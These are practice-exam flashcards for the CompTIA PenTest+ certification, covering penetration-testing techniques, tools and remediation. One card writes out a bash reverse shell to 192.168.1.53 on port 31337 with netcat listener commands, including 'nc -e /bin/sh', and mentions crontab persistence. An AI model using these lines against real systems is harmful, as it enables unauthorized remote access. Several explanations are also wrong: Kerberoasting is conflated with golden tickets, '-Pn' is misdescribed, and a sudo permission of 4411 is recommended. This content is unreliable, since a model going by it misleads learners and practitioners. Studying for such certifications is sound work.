CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason Dion 2 of 6) Flashcards
You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack? A.Deauthentication attack B.Downgrade attack C.Fragmentation attack D.Karma attack
C.Fragmentation attack
Explanation:
OBJ-3.3: A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up cracking the WEP password; otherwise, it might take a while to receive enough packets to get the repeated IV. In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
A.Manually review the syslog servers log’s
B.Conduct a service discovery scan on the network
C.Conduct an OS fingerprinting scan across the network
D.Conduct a packet capture of data traversing the server network
C.Conduct an OS fingerprinting scan across the network
Explanation:
OBJ-2.1: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually reviewing the Syslog server’s logs would take too long and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the servers actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not effectively identify which servers are running which operating systems. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate whether the underlying server is running Linux or Windows.
During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords? A.Rainbow table attack B.Brute force attack C.Cognitive password attack D.Birthday attack
C.Cognitive password attack
Explanation:
OBJ-2.4: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publicly available about Sarah Palin (like her birthday, high school, and other such information).
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE)
A.Whitelist all specific IP blocks that use this application
B.Rename the URL to a more obscure name
C.Require two-factor authentication for access for the application
D.Conduct a penetration test against the organization's IP space
E.Change the username and default password
F.Require an alphanumeric passphrase for the application's default password
A.Whitelist all specific IP blocks that use this application
C.Require two-factor authentication for access for the application
E.Change the username and default password
Explanation:
OBJ-5.3: First, you should change the username and default password since using default credentials is extremely insecure. Second, you should implement a whitelist for any specific IP blocks with access to this application’s administrative web frontend since it should only be a few system administrators and power users. Next, you should implement two-factor authentication to access the application since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application’s default password. Since it is a default password, you cannot change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization’s IP space to identify other vulnerabilities, it will not positively affect remediating this identified vulnerability.
A cybersecurity analyst conducts proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Query: “mimikatz” NOT “EventCode=4658” NOT “EventCode=4689” EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on? A.Processor consumption B.Unauthorized software C.Irregular peer-to-peer communication D.Data exfiltration
B.Unauthorized software
Explanation:
OBJ-4.2: This is a difficult question, but you should see a keyword in the query, “mimikatz.” Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs, and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket, or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. It is definitely considered unauthorized software and should be immediately alerted upon if discovered in your network. Data exfiltration is the process by which an attacker takes data that is stored inside of a private network and moves it to an external network. Processor consumption is an IoC that monitors the per-process percentage of CPU time to show what causes the problem. Irregular peer-to-peer communication occurs when hosts within a network establish connections over unauthorized ports or data transfers.
A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix) (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of action did the analyst perform, based on the command and response above? A.SQL Injection B.Banner Grabbing C.Querying the Whois database D.Cross-site scripting
B.Banner Grabbing
Explanation:
OBJ-4.2: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat and then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver; in this example, it reveals the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser-side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A.apache_log B.access_log C.httpd_log D.http_log
B.access_log
Explanation:
OBJ-2.3: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server's pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files within a Postgres database.
What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings? A.Hardening B.Harvesting C.Stealthing D.Windowing
A.Hardening
Explanation:
OBJ-5.3: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windowing is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation? A.Service level agreement B.Memorandum of understanding C.Rules of engagement D.Acceptable use policy
C.Rules of engagement
Explanation:
OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A.nmap -Pn 10.0.0.0/25 B.nmap -Pn 10.0.0.0,1.0.2.0,3.0 C.nmap -Pn 10.0.0.0/23 D.nmap -Pn 10.0.0-3.0
D.nmap -Pn 10.0.0-3.0
Explanation:
OBJ-4.1: The simplest way to scan multiple subnets adjacent to each other is to use a range in the target specification. The -Pn option tells the command to conduct a host-only scan of every IP in this target space without using ping. Using the dash (-) in the IP address means to scan “this network through this network.” So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.
You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen:
To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here:
Based on the output and packet capture above, which of the following types of exploits did you use?
A.Pass the hash attack
B.FTP Exploit
C.LLMNR Exploit
D.DNS cache poisoning
C.LLMNR Exploit
Explanation:
OBJ-3.2: Windows computers do not rely on DNS for name resolution within the internal networks. Instead, they rely on NetBIOS Name Service (NBNS) queries. Since Windows Vista, though, NBNS queries have been replaced with the Link-Local Multicast Name Resolution (LLMNR) protocol. The Responder tool in Kali Linux is used to conduct NBNS, LLMNR, and DNS name resolution exploits. In this example, Responder is being used to answer the Windows host asking for name resolution for the system called “wpad” but provides the IP for the Kali Linux machine instead of the correct IP. The first highlighted section shows the LLMNR query for the host “wpad” being sent by the Windows 7 host and answered by the Kali host running Responder. The last highlighted section shows the Windows 7 host getting the wpad.dat file by providing their credentials to the Kali host. There are several clues in this question to the right answer. First, the question mentions that you waited 15 minutes. Within Windows networks using the older NetBIOS system, each Windows machine would send out a broadcast message with its IP and WINS name every 10-15 minutes. Some of this functionality remains within LLMNR, too. But, the easier clue to identify is from the Wireshark packet capture. It clearly shows the protocol being used in lines 1212 through 1216 as LLMNR during the query and response. For this question, I was even nice enough to highlight that portion in red, but don’t expect the exam to be nearly as kind!
You are conducting a penetration test against an organization's Windows network. You have dumped the hash of their krbtgt account from the server's memory and used it to create golden tickets. Which of the following types of privilege escalation have you performed? A.Insecure sudo B.DLL Hijacking C.cPassword extraction D.Kerberoasting
D.Kerberoasting
Explanation:
OBJ-3.5: Kerberoasting is the dumping of the hash of the krbtgt (Kerberos ticket-granting ticket) from a server’s memory using a domain-based user account. This is then used to create new golden tickets that allow any domain user to request the Ticket Granting Ticket from a domain service account. This can be cracked offline to reveal the plaintext password of the account. Many Windows services run with administrative privileges, and most system administrators don’t frequently change these passwords. This can lead to an attacker gaining access to a domain for a long period of time.
You are analyzing the following network utilization report because you suspect one of the servers has been compromised.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
IP Address      Name          Uptime             Historical   Current
192.168.20.2    web01         7D 12H 32M 06S     42.6 GB      44.1 GB
192.168.20.3    webdev02      4D 07H 12M 45S     1.95 GB      2.13 GB
192.168.20.4    dbsvr01       12D 02H 46M 14S    3.15 GB      24.6 GB
192.168.20.5    marketing01   2D 17H 18M 41S     5.2 GB       4.9 GB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further? A.web01 B.webdev02 C.dbsrv01 D.marketing01
C.dbsrv01
Explanation:
OBJ-3.7: Due to the considerable increase in network utilization on dbsvr01, it should be suspected of compromise and further investigated. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This increase is nearly 8x more than the previous month when all of the other servers stayed relatively constant. This indicates a possible compromise of the database server (dbsvr01) and a data breach or data exfiltration.
Your company has just announced a change to an “API first” model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability?
A.Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
B.Lack of input validation could allow for a SQL attack
C.Lack of input validation could lead to a cross-site scripting attack
D.Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited
A.Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
Explanation:
OBJ-2.4: When implementing an API, objects in memory from one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may create a fictitious object, appropriately serialize it, and then send it through the API for execution. The only model for defeating this approach is to allow the API to be exposed only to trusted sources or to not serialize anything with potentially executable source code (i.e., non-primitive data types). Cross-site scripting and SQL attacks are not a concern for an API first model. While insufficient logging and monitoring would prevent an analyst from detecting if a deserialization vulnerability was exploited, these alone would not be the basis for an attack against deserialization.
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A.Use of insecure functions B.Insecure object reference C.Improper error handling D.Insufficient logging and monitoring
C.Improper error handling
Explanation:
OBJ-2.3: This is an example of an improper error handling vulnerability. A well-written application must be able to handle errors and exceptions gracefully. The main goal must be for the application not to fail in a way that allows the attacker to execute code or perform an injection attack. One famous example of an improper error handling vulnerability is Apple’s GoTo bug, as described above. For more details on this particular vulnerability, please see CVE-2014-1266. Insecure object reference refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. Insufficient logging and monitoring allow attackers to achieve their goals without being detected due to the lack of monitoring and timely response by defenders. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used. These insecure functions can lead to buffer overflow and other exploits being successful against a program.
During your reconnaissance, you have determined that your client’s employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these?
A.Identify a jailbroken device for easy exploitation
B.Use web-based exploits against the devices' web interfaces
C.Use social engineering to trick a user into opening a malicious APK
D.Use a tool like ICSSPLOIT to target specific vulnerabilities
A.Identify a jailbroken device for easy exploitation
Explanation:
OBJ-2.5: When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place? A.Social engineering B.Phishing C.Session hijacking D.Privilege escalation
D.Privilege escalation
Explanation:
OBJ-3.5: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.
You are watching as a penetration tester is conducting an engagement against Dion Training’s network. You see the following commands and output in their terminal:
-=-=-=-=-=-=-
# find / -perm +4000 -user root -type f -print
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/passwd
/usr/games/mahjong
# chmod 4111 /usr/bin/sudo
-=-=-=-=-=-=-
Which of the following vulnerabilities is the penetration tester trying to exploit? A.Unquoted service path vulnerability B.Unsecure SUDO vulnerability C.Sticky bit vulnerability D.Kernel vulnerability
B.Unsecure SUDO vulnerability
Explanation:
OBJ-3.5: This penetration tester is attempting to exploit an unsecure SUDO vulnerability. First, they ran the find command and specified that it should look for permissions that follow the numerical representation of the SUID bit permission (+4000). It also looked for any files that were owned by the root user and were considered regular files (f), and then displayed them on the screen. There were 4 files found in this example, one of which was the /usr/bin/sudo file. Next, the penetration tester attempted to perform a chmod against the /usr/bin/sudo file and set its permissions to 4111. If they were successful, this would change the permissions to allow the user, the group, and everyone else on this computer to execute the sudo command. When the sudo command is run, because it has the SUID bit set, the user can run the command as the root user. For this reason, the /usr/bin/sudo should have its permissions set to 4411 and not 4111.
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?
A.Automated patch deployment
B.Log consolidation
C.Intrusion prevention system
D.Anti-virus software
C.Intrusion prevention system
Explanation:
OBJ-2.5: Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment, so to prevent malicious activity you could set up strict IPS rules that block unknown types of actions from occurring. Log consolidation is a good idea, but it won’t prevent an issue and therefore isn’t the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.
What role does the red team perform during a tabletop exercise (TTX)? A.Adversary B.Cybersecurity analyst C.System Administrator D.Network defender
A.Adversary
Explanation:
OBJ-1.3: The red team acts as the adversary, attempting to penetrate the network or exploit it as a rogue internal attacker. The red team might be selected members of in-house security staff, a third-party company, or a consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.
You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize? A.Spoofing B.Tailgating C.Shoulder surfing D.Impersonation
B.Tailgating
Explanation:
OBJ-3.6: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.
You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command.
Which of the following types of exploits are you attempting?
A.Credential brute forcing
B.Sandbox escape
C.Pass the hash
D.Credentials harvesting
C.Pass the hash
Explanation:
OBJ-4.3: A pass the hash attack is a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on. When authenticating with a username and password, the password is hashed once you type it in. Therefore, the computer doesn’t recognize a difference between the password and the hash itself. So, if you use psexec to send the hash to the system directly, it can be used to authenticate you as that user without actually knowing the user’s password. The key to answering this question is identifying that the smbpass parameter is being set to a password hash of a specified user.
A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to a suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?
A.Hardening the DEV_SERVER7 server
B.Logically isolate the PAYROLL_DB server from the production network
C.Conduct a Nessus scan of the FIREFLY server
D.Conduct a data criticality and prioritization analysis
D.Conduct a data criticality and prioritization analysis
Explanation:
OBJ-2.3: While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems, which would be a more lucrative target for APT 38 than the PAYROLL_DB? The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.
What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should ignore any remaining risk
C.You should continue to apply additional controls until there is zero risk
D.You should remove the current controls since they are not completely effective
A.You should accept the risk if the residual risk is low enough
Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.
Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary's computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary's computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary? A.Evil twin B.IP Spoofing C.ARP cache poisoning D.MAC Spoofing
C.ARP cache poisoning
Explanation:
OBJ-3.2: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.
What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan that scans ports 80 and 443
B.A stealth scan that scans all open ports excluding ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system
D.A stealth scan that scans ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system
Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.
A penetration tester just entered the following command into a Bash shell on Dion Training’s server:
-=-=-=-=-=-
bash 1>& /dev/tcp/192.168.1.53/31337 0>&1
-=-=-=-=-=-
Before the penetration tester runs that command, what must they run first on their machine?
A.nc -nlvp 31337
B.nc 192.168.1.53 31337
C.bash 0>& /dev/tcp/127.0.0.1/31337 1>&0
D.nc -e /bin/sh 192.168.1.53 31337
A.nc -nlvp 31337
Explanation:
OBJ-4.3: The bash command entered by the penetration tester on the Dion Training server is a redirector that sends information back to a listener. Therefore, the penetration tester needs to first set up a listener on their own machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nvlp 31337). The bash command says to redirect the standard output (1) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could also be configured using crontab to run this Bash command every day at a certain time.
Which of the following vulnerabilities is the greatest threat to data confidentiality?
A.SSL Server with SSLv3 enabled vulnerability
B.HTTP TRACE/TRACK methods enabled
C.phpinfo information disclosure vulnerability
D.Web application SQL injection vulnerability
D.Web application SQL injection vulnerability
Explanation:
OBJ-5.1: Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system’s data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn’t disclose any information about the data stored within the system, though, so it isn’t a great threat to our data’s confidentiality.
What tool is used to collect wireless packet data?
A.Netcat
B.John The Ripper
C.Aircrack-ng
D.Nessus
C.Aircrack-ng
Explanation:
OBJ-4.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.
Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend they implement first?
A.Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console
B.Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
C.Ensure that all screen capture content is visibly watermarked
D.Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
B.Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchased which game
Explanation:
OBJ-5.3: Ensuring that each console has its own unique key will allow the console manufacturer to track who has purchased which games when using digital rights management licensing. This can be achieved using a hardware root of trust, such as a TPM module in the processor. While encrypting the games during distribution will provide some security, the games could be decrypted and distributed by unauthorized parties if the encryption key were ever compromised. The recommendation of making the game arbitrarily large will frustrate both authorized and unauthorized users, which could negatively impact sales, so it is a poor recommendation to implement. Visibly watermarking everything will only aggravate the user, provide a negative customer experience, and not help fight software piracy.
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO)
A.Patching
B.NIDS
C.Disabling unused services
D.Segmentation
C.Disabling unused services
D.Segmentation
Explanation:
OBJ-2.5: Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.
During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance’s operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability?
A.Mark the identified vulnerability as a false positive
B.Try to gain access to the underlying operating system and install the patch
C.Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
Explanation:
OBJ-5.3: You should contact the vendor to determine if a patch is available for installation. Since this is a vendor-supported appliance installed under a service contract, the vendor is responsible for the appliance’s management and security. You should not attempt to gain access to the underlying operating system to patch the vulnerability yourself, as this could void your warranty and void your service contract. Based on the information provided, there is no reason to believe that this is a false positive, either. You should not simply wait 30 days and rerun the scan, as this is a non-action. Instead, you should contact the vendor to fix this vulnerability. Then, you could rerun the scan to validate they have completed the mitigations and remediations.
A project lead reviews the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The work statement specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure. Based on this scope of work, what type of activity is to be performed?
A.Vulnerability scanning
B.Social Engineering
C.Penetration testing
D.Session hijacking
C.Penetration testing
Explanation:
OBJ-1.3: Penetration testing is the act of using a computer system, an individual network, or another application to find vulnerabilities that an attacker could use to compromise your systems. Penetration testing can also find endpoints with vulnerabilities that increase the attack surface.
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered?
A.White Box
B.Red Box
C.Black Box
D.Gray Box
C.Black Box
Explanation:
OBJ-1.3: In a black box assessment, the penetration tester takes an average hacker’s role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.